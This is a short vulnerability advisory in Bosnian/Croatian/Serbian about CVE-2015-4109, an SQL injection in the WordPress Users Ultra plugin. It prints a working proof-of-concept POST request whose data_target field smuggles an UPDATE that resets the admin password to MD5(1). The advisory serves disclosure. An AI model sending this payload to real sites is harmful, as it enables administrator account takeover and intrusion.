WordPress Users Ultra Plugin SQL Injection ranjivost
POST parametri data_target i data_vote akcije wp_ajax_noprov_rating_vote mogu biti iskorišteni za SQL Injection napad. Navedeni proof of concept mjenja admin password u 1 i omogućava napadaču pristup sistemu :
* Slanje post requesta na`http://ranjivi.website.com/wp-admin/admin-ajax.php` sa : action=rating_vote&data_id=1
&data_target=user_id IN (1); UPDATE wp_users set user_pass=MD5(1) where ID &data_vote=1
* Omogućen pristup administratorskim korisničkim imenom i passwordom 1.
POC pretpostavlja prefiks tabele i ID admina. Verzija 1.5.16 otkonila je ovu ranjivost.
Izvor:https://twitter.com/panVagenas
Značaj ranjivosti:HITNO
Platforma:BSD UNIX
CVE oznaka:CVE-2015-4109